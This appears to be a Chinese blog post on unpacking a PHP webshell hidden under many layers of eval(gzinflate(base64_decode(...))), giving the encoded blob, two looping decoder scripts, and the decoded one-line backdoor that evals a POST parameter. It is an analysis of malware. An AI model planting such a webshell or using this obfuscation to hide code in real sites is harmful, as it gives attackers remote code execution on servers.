eval、gzinflate、 base64_decode三函数加密的代码在线解密-其他话题-爱宅域

<p style="margin-bottom: 15px; word-wrap: break-word; color: rgb(85, 85, 85); font-family: 'Microsoft Yahei'; font-size: 15px; line-height: 24px; background-color: rgb(255, 255, 255);">今天群里一位朋友发了一个php的马子，经过了gzinflate和base64_decode加密，求解密，这种加密方法我以前也见过，只用把eval改为echo即可实现解密，但是情况并不是我想象的那么简单，输出的依然是乱码，网上找了一下终于找到了解决之道，分享给大家。</p><p style="margin-bottom: 15px; word-wrap: break-word; color: rgb(85, 85, 85); font-family: 'Microsoft Yahei'; font-size: 15px; line-height: 24px; background-color: rgb(255, 255, 255);">PHP目前在网络中被用的越来越多，加密解密的话题也一直没有停息过。下面简单介绍一下base64_decode+gzinflate压缩编码和解码代码方法，就是通常我们在程序中见的eval(gzinflate(base64_decode('加密代码'))); 形式的加密方法。</p><p style="margin-bottom: 15px; word-wrap: break-word; color: rgb(85, 85, 85); font-family: 'Microsoft Yahei'; font-size: 15px; line-height: 24px; background-color: rgb(255, 255, 255);">首先，针对一层加密的，我们可以直接把eval改为echo即可解密，这里我就不多解释了，今天要解密的代码如下：</p><h3 style="font-family: 'Microsoft Yahei'; line-height: 1.1; color: rgb(85, 85, 85); margin-top: 20px; margin-bottom: 15px; font-size: 16px; padding-top: 10px; padding-bottom: 10px; background-color: rgb(255, 255, 255);">经过加密的代码</h3><pre style="font-family: Menlo, Monaco, Consolas, 'Courier New', monospace; font-size: 12.5px; padding: 10px 15px; margin: 10px 2em; line-height: 1.42857143; color: rgb(85, 85, 85); word-wrap: break-word; border-width: 1px 1px 1px 4px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-color: rgb(242, 242, 242) rgb(242, 242, 242) rgb(242, 242, 242) rgb(204, 0, 0); border-top-left-radius: 4px; border-top-right-radius: 4px; border-bottom-right-radius: 4px; border-bottom-left-radius: 4px; white-space: pre-wrap; width: auto; background: rgb(255, 255, 224);"><?php
echo(gzinflate(base64_decode('DdS3EqNWAEDRfn/Eu0NBTmOPd8hCpEcWNB7CAyRA5Pj13u42p72///3n99iMP37APet+1vf7W3XZCn/m2QIZ6r8SFkMJf/4ll96jnWxdUGSvipB2wnTz8xBSECiRrp8C1DlCud/NqVu1lcEKLGq1V+jN3hxKkTvHZ6uSVWv0zUV0hZ1f9a9xJPwBpYbrQc0Xw5YJAUra6iKodOSy5tPe7Gt7fRLuqRnu0IO7HmRrVD1fxFeK2f2O1fv5wqik6ci0XuSjF4Swsih9w1QiGhdHod7s1r9EhnivBnLsmn4xa4lbDA6WrAPtdbdEHOZswZhkFO3s0/HloCA9DY8P4+bJkXLIdchUxFHPTxKZWt+WnWmGLXhiQHN3qm0Q6VnoO3vY/ckHsWOIGlV8XMV+UaZEcKBPsZgj+S7kKISh2ZQiNnVK4zlHRIt6B3jDl1Q4+e1dy5ZqmXb73JPXtWn+17i/hvBQFlEdrFopoTeovgwy5WxlIZVZNEnYBYkG6g9OQrBgxMC7yVs6jwjMpoeCIIio/dFLm3cHTaA141F+CvRT0swD9PPbqdBl3Hyo7kclQMFmTIumUi3tyVEMWI6S7DE3Ycn148vqQGTmZJx9OU5gjQg5gjN2jZ1QDgALD40TJJQQGj9S4JXm6GlyYW3wDViCyCEpeB4wiJWX8za3/WYMePG2i03eKDCHrtUlY1qsOEje1ZNI0Vys8DHUy5iAW/yVvs+mESrbTA9BLQtsI52NNSsmEQ5J8FHadb0gFXiQsWTHoOfByWnW9zaJz/uTND4Mts76xBqIVB48F1l7rvf50Dg+XBai/DzNS40ITBXbsJxjsOjqWKN9/piDp6nOSUu+0qwz8KM4ibR1MLL6TpK4PKjNd+0IWZE/8R3myU3TJ+X3/ZiO1ewlH/p8PBoGh6C+71RfrG7Ir7kSri3QDmWGZ+v3rIjfsIqVqCfPGwZPxV6+CoRE60eY1DhE57EGl77cJtPd7aKbY44XEjjTsqZGpaYLy4VEWORuuCAcYz0TTtc8Ui7UpgaqpU7NSSi4r7wnLLHlmXA8tbSA+9CZvhz77ZWq7A37rvoMFytqNlzcb6NQnEu/wzMusfJBn68TzeTtcpGEdujKeOnrFngtW8RO7VTMIm5evd80RnEQ0+O78O+JYEMd5a9stxWXWxWJaKV6qiTPYXxFV/rdUhFGQmb+jbmHML4fHF/tLILuYKYRNEHr6q9fv379/eP3nxn9Dw==')));
?></pre><p style="margin-bottom: 15px; word-wrap: break-word; color: rgb(85, 85, 85); font-family: 'Microsoft Yahei'; font-size: 15px; line-height: 24px; background-color: rgb(255, 255, 255);">我尝试过把eval改为echo结果发现还是类似的东西，经过查找终于发现了解决办法。</p><h3 style="font-family: 'Microsoft Yahei'; line-height: 1.1; color: rgb(85, 85, 85); margin-top: 20px; margin-bottom: 15px; font-size: 16px; padding-top: 10px; padding-bottom: 10px; background-color: rgb(255, 255, 255);">解密方法1</h3><pre style="font-family: Menlo, Monaco, Consolas, 'Courier New', monospace; font-size: 12.5px; padding: 10px 15px; margin: 10px 2em; line-height: 1.42857143; color: rgb(85, 85, 85); word-wrap: break-word; border-width: 1px 1px 1px 4px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-color: rgb(242, 242, 242) rgb(242, 242, 242) rgb(242, 242, 242) rgb(204, 0, 0); border-top-left-radius: 4px; border-top-right-radius: 4px; border-bottom-right-radius: 4px; border-bottom-left-radius: 4px; white-space: pre-wrap; width: auto; background: rgb(255, 255, 224);"><?php
/**
 * Created BY 独自等待
 */
//已经加密的文件内容
$a = "eval(gzinflate(base64_decode('这里面放BASE64代码')));";
function decodephp($a)
{
    $max_level = 300; //最大层数
    for ($i = 0; $i < $max_level; $i++) {
        ob_start();
        eval(str_replace('eval', 'echo', $a));
        $a = ob_get_clean();
        if (strpos($a, 'eval(gzinflate(base64_decode') === false) {
            return $a;
        }
    }
}

echo decodephp($a);
?>
</pre><h3 style="font-family: 'Microsoft Yahei'; line-height: 1.1; color: rgb(85, 85, 85); margin-top: 20px; margin-bottom: 15px; font-size: 16px; padding-top: 10px; padding-bottom: 10px; background-color: rgb(255, 255, 255);">解密方法2</h3><pre class="brush:php" style="font-family: Menlo, Monaco, Consolas, 'Courier New', monospace; font-size: 12.5px; padding: 10px 15px; margin: 10px 2em; line-height: 1.42857143; color: rgb(85, 85, 85); word-wrap: break-word; border-width: 1px 1px 1px 4px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-color: rgb(242, 242, 242) rgb(242, 242, 242) rgb(242, 242, 242) rgb(204, 0, 0); border-top-left-radius: 4px; border-top-right-radius: 4px; border-bottom-right-radius: 4px; border-bottom-left-radius: 4px; white-space: pre-wrap; width: auto; background: rgb(255, 255, 224);"><?php
/**
 * Created BY 独自等待
 */
$a = file_get_contents("加密.php"); //含有eval语句的文本文件
//将有eval(gzinflate(base64_decode的加密文件只留eval(gzinflate(base64_decode('...');"语句
//其他诸如"<?"等信息都去掉并保存文件为"加密.php"
while (strstr($a, "eval")) {
    ob_start();
    eval(str_replace("eval", "echo", $a));
    $a = ob_get_contents();
}
echo $a;
?>
</pre><p style="margin-bottom: 15px; word-wrap: break-word; color: rgb(85, 85, 85); font-family: 'Microsoft Yahei'; font-size: 15px; line-height: 24px; background-color: rgb(255, 255, 255);">最终经过密码得到源代码如下：</p><pre class="brush:php" style="font-family: Menlo, Monaco, Consolas, 'Courier New', monospace; font-size: 12.5px; padding: 10px 15px; margin: 10px 2em; line-height: 1.42857143; color: rgb(85, 85, 85); word-wrap: break-word; border-width: 1px 1px 1px 4px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-color: rgb(242, 242, 242) rgb(242, 242, 242) rgb(242, 242, 242) rgb(204, 0, 0); border-top-left-radius: 4px; border-top-right-radius: 4px; border-bottom-right-radius: 4px; border-bottom-left-radius: 4px; white-space: pre-wrap; width: auto; background: rgb(255, 255, 224);"><?php eval($_POST[coo0l]);?></pre><p style="margin-bottom: 15px; word-wrap: break-word; color: rgb(85, 85, 85); font-family: 'Microsoft Yahei'; font-size: 15px; line-height: 24px; background-color: rgb(255, 255, 255);">不知道是哪位大牛的一句话，经过了这么多层加密，太强大了。</p><h3 style="font-family: 'Microsoft Yahei'; line-height: 1.1; color: rgb(85, 85, 85); margin-top: 20px; margin-bottom: 15px; font-size: 16px; padding-top: 10px; padding-bottom: 10px; background-color: rgb(255, 255, 255);">在线解密：<a target="_blank" href="http://www.cnxct.com/cfc4n/eval-gzinflate-base64_decode.php">http://www.cnxct.com/cfc4n/eval-gzinflate-base64_decode.php</a></h3>

经过加密的代码

解密方法1

解密方法2

在线解密：http://www.cnxct.com/cfc4n/eval-gzinflate-base64_decode.php